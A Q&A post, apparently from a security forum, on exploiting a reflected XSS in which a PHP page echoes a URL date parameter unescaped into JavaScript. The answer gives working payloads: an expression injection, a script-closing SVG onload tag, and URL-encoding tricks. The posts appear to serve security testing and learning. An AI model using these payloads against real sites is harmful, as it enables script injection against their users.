# set newline or slash through URL

Tags: xss, url

There is an option to set date range through URL address bar like this

```
domain.tld/process/date_range:2017-04-13%7C2017-05-02
```

GET parameter is parsed in PHP like this

```
    ...
<?php if(isset($dateTo)): ?>
    endDate: moment("<?php echo $dateTo; ?>", "YYYY-MM-DD"),
<?php else : ?>
    ...
```

and the this is echoed directly to javascript

```
<script>
$(document).ready(function() {

    $('#r').daterangepicker({
        startDate: moment("2017-04-01", "YYYY-MM-DD"),
        endDate: moment("2017-05-1", "YYYY-MM-DD"),
        ...
```

so i am trying to modify GET param by adding

```
")%7D);console.log(1234);});
```

then i am able  to get

```
<script>
$(document).ready(function() {
    $('#r').daterangepicker({
        startDate: moment("2017-04-13", "YYYY-MM-DD"),
        endDate: moment("2017-05-02")});console.log(1234);});", "YYYY-MM-DD"),
        ...
```

but line

```
endDate: moment("2017-05-02")});console.log(1234);});", "YYYY-MM-DD"),
```

generates syntax error and then console.log(1234) is not interpreted.

How can I get that working?

its internal project

Answer (score 2):

You code has at least one closing bracket too much. You need to properly comment out the junk at the end (with `//` or `/*`):

```
        endDate: moment("2017-05-02")});console.log(1234);});", "YYYY-MM-DD"),
                                                             |---------------|
```

But in your example, the easiest XSS payload would just be:

```
",console.log(1234),"
```

Instead of adding an extra statement, this injects `console.log` as an expression.

If you don't want to mess with the Javascript syntax (and angle brackets are permitted), you can also just close the script block and open a new tag, like so:

```
</script><svg/onload=console.log(1234)>
```

This works because the syntax error you're producing in the previous script doesn't block other independent scripts on the site from executing.

(Slashes can be URL-encoded as `%2f` and newline characters as `%0a` or `%0d%0a`, respectively.)